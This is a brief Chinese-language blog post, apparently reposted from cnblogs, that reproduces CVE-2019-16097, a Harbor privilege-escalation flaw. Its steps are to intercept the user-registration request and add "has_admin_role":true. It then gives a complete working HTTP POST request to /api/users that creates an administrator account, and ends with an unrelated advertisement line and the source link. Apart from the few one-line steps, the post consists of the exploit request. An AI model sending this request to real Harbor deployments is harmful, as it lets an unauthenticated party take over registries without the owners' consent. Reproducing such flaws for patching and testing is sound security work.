Harbor任意管理员注册漏洞复现CVE-2019-16097

注册时抓包

添加poc

"has_admin_role":true

管理员权限

POC

POST /api/users HTTP/1.1
Host: 127.0.0.1
Content-Length: 131
Accept: application/json
Origin: http://127.0.0.1
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Content-Type: application/json
Referer: http://127.0.0.1/harbor/sign-in
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=5bb9aad90164bd2ed5274edaf20f9c81
Connection: close

{"username":"mrhonest","email":"mrhonest@qq.com","realname":"mrhonest","password":"111111Aaa","comment":"11111","has_admin_role":true}
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/mrhonest/p/11561619.html